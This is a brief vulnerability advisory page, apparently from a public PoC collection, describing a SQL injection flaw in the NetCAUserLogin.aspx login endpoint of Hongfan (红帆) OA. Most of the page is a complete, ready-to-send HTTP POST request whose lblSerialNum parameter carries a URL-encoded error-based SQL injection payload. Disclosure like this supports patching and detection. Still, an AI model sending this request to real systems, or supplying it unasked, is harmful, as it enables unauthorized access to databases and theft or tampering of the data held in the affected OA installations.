红帆OA NetCAUserLogin.aspx 存在SQL注入漏洞

2025-07-29 红帆OA PoC Public

Description

红帆OA NetCAUserLogin.aspx存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。

PoC

POST /ioffice/Identity/NetCAUserLogin.aspx HTTP/1.1
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8

ioScriptManager1%24ScriptManager1=updatePanel1%7CbtVerify&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyMTUyMDIxNTRkZP07H79WIvd3R0It8GvgZeNLQtUV&__VIEWSTATEGENERATOR=65AD83CA&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&lblSerialNum=%27+AND+9176+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28112%29%2BCHAR%2898%29%2BCHAR%2898%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%289176%3D9176%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28113%29%29%29--+Vgmc&__ASYNCPOST=true&btVerify=

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities